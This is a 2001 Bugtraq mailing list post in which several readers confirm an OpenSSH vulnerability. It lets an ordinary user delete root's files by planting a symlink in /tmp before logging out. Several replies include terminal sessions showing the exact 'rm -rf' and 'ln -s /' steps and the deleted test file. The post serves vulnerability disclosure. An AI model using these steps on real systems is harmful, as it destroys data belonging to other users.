[20871] in bugtraq
Re: SSH allows deletion of other users files...
daemon@ATHENA.MIT.EDU (aleph1@securityfocus.com)
Tue Jun 5 17:42:29 2001
Date: Tue, 5 Jun 2001 11:30:37 -0600
From: aleph1@securityfocus.com
To: bugtraq@securityfocus.com
Message-ID: <20010605113037.A12758@securityfocus.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3B1BB27A.1020104@bsd.st>
Tomas Ericsson <te@matematik.su.se>
The vulnerability works perfectly for me: sshd version OpenSSH_2.3.0 green@FreeBSD.org 20010321
# uname -a
FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001
root@jkh101.osd.bsdi.com:/usr/src/sys/compile/GENERIC alpha
[root@myhost root]# echo "testing">/cookies
[root@myhost root]# ls -l /cookies
-rw-r--r-- 1 root wheel 8 Jun 5 01:48 /cookies
[root@myhost root]# ssh -l te myhost
[te@myhost te]# rm -rf /tmp/ssh-1i24iea5
[te@myhost te]# ln -s / /tmp/ssh-1i24iea5
[te@myhost te]# logout
[root@myhost root]# ls -l /cookies
ls: /cookies: No such file or directory
Shannon Lee <shannon@scatter.com>
reproduced with OpenSSH_2.3.0p1 on redhat 6.2.
TE <te@linux.nu>
This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
updated packages from RedHat installed.
RH71# uname -a
Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
RH71# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-5
RH70# uname -a
Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
RH70# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-1.7.2
"David Thiel" <dthiel@nexprise.com>
I tested this on 4.3-RELEASE, and was successful.
SSH Version OpenSSH_2.3.0 green@FreeBSD.org 20010321
KF <dotslash@snosoft.com>
Works on my box
[root@bounce dotslash]# cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)
root@bounce dotslash]# ssh -V
SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
Compiled with SSL (0x0090581f).
Jan-Frode Myklebust <janfrode@parallab.uib.no>
I just tested with OpenSSH_2.5.2p2 on RedHat 7.0,
and OpenSSH_2.9p1 on IRIX 6.5 and both are
vulnerable to this. I used protocol version 2 on
both machines.
Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>
Confirmied on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
X forwarding activated.
"Golden_Eternity" <bhodi@bigfoot.com>
I tried to reproduce this on a system running ssh 2.4.0, but I was unable to
locate the /tmp/ssh-* directory.
What version of ssh were you using when you discovered this?
[test@shiva test]$ ssh test@localhost
warning: Need basic cursor movement capablity, using vt100
test's password:
Authentication successful.
Last login: Mon Jun 04 2001 10:42:08 -0700
No mail.
[test@shiva test]$ ls -l /tmp/
total 12
drwxr-xr-x 2 root root 12288 Apr 8 11:59 lost+found
[test@shiva test]$
"Schlosser, Matt D." <mschlosser@eschelon.com
On the contrary, it just takes another form:
[root@bob /root]# touch /cookies;ls /cookies
/cookies
[root@bob /root]# ssh zen@localhost
zen@localhost's password:
[zen@bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
[zen@bob zen]$ logout
Connection to localhost closed.
[root@bob /root]# ls /cookies
/bin/ls: /cookies: No such file or directory
--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
